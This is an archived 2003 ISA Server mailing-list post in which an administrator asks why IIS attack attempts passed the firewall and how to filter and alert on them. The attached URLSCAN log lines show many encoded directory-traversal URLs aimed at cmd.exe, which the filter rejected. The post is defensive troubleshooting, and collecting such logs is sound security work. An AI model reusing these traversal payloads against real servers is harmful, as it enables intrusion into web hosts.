FW: WEB server URLSCAN logs

  • From: "Darryl Janetzki" <darrylj@xxxxxxxxxxxxxxxx>
  • To: <isalist@xxxxxxxxxxxxx>
  • Date: Wed, 2 Jul 2003 00:48:52 +1000

Please find attached a sample of the URLSCAN log on an internal WWW
server that has been published with ISA server
 
The ISA server has SP1 and the URLSCAN filter enabled, The local server
has the URLSCAN filter also
My first question is: Why did these attempts pass the ISA server. I was
of the opinion that the published and internal web servers would be
protected by this filter. Any suggestions on resolving this? and perhaps
a "white hat" site for testing ISA security for these type of attacks
The last question is .... Is it possible to create a "special content
filter" to filter this type of traffic  and an alert when this activity
is happening  to protect IIS services.  I
This attack went on for several days. It would have been an advantage to
have had an alarm that an attack was underway 
My current strategy is to create a filter for each offending site. 
 
 
Thanks
Darryl
 
06-30-2003 - 05:38:02] Client at 211.42.172.247: URL contains sequence
'..', which is disallowed. Request will be rejected.  Site Instance='1',
Raw
URL='/iisadmpwd/..%f8%80%80%80%af../..%f8%80%80%80%af../..%f8%80%80%80%a
f../winnt/system32/cmd.exe'
[06-30-2003 - 05:38:02] Client at 211.42.172.247: URL contains sequence
'..', which is disallowed. Request will be rejected.  Site Instance='1',
Raw URL='/PBServer/..%c0%9v../winnt/system32/cmd.exe'
[06-30-2003 - 05:38:02] Client at 211.42.172.247: URL contains sequence
'..', which is disallowed. Request will be rejected.  Site Instance='1',
Raw URL='/iisadmpwd/..%f8%80%80%80%af../winnt/system32/cmd.exe'
[06-30-2003 - 05:38:02] Client at 211.42.172.247: URL contains sequence
'..', which is disallowed. Request will be rejected.  Site Instance='1',
Raw
URL='/iisadmpwd/..%fc%80%80%80%80%af../..%fc%80%80%80%80%af../..%fc%80%8
0%80%80%af../winnt/system32/cmd.exe'
[06-30-2003 - 05:38:02] Client at 211.42.172.247: URL contains sequence
'..', which is disallowed. Request will be rejected.  Site Instance='1',
Raw URL='/iisadmpwd/..%fc%80%80%80%80%af../winnt/system32/cmd.exe'
[06-30-2003 - 05:38:05] Client at 211.42.172.247: URL contains sequence
'..', which is disallowed. Request will be rejected.  Site Instance='1',
Raw URL='/iisadmpwd/..%u0025%u005c..%u0025%u005cwinnt/system32/cmd.exe'
[06-30-2003 - 05:38:05] Client at 211.42.172.247: URL contains sequence
'..', which is disallowed. Request will be rejected.  Site Instance='1',
Raw
URL='/PBServer/..%c1%af../..%c1%af../..%c1%af../winnt/system32/cmd.exe'
[06-30-2003 - 05:38:05] Client at 211.42.172.247: URL contains sequence
'..', which is disallowed. Request will be rejected.  Site Instance='1',
Raw URL='/PBServer/..%c1%af../winnt/system32/cmd.exe'
[06-30-2003 - 05:38:05] Client at 211.42.172.247: URL contains sequence
'..', which is disallowed. Request will be rejected.  Site Instance='1',
Raw
URL='/PBServer/..%c0%qf../..%c0%qf../..%c0%qf../winnt/system32/cmd.exe'
[06-30-2003 - 05:38:08] Client at 211.42.172.247: URL contains sequence
'..', which is disallowed. Request will be rejected.  Site Instance='1',
Raw
URL='/PBServer/..%f0%80%80%af../..%f0%80%80%af../..%f0%80%80%af../winnt/
system32/cmd.exe'
[06-30-2003 - 05:38:08] Client at 211.42.172.247: URL contains sequence
'..', which is disallowed. Request will be rejected.  Site Instance='1',
Raw URL='/PBServer/..%f0%80%80%af../winnt/system32/cmd.exe'
[06-30-2003 - 05:38:08] Client at 211.42.172.247: URL contains sequence
'..', which is disallowed. Request will be rejected.  Site Instance='1',
Raw URL='/PBServer/..%u002e..%u002e/winnt/system32/cmd.exe'
em32/cmd.exe'

Other related posts:

  1. Home
  2. isalist
  3. Archive
  4. 07-2003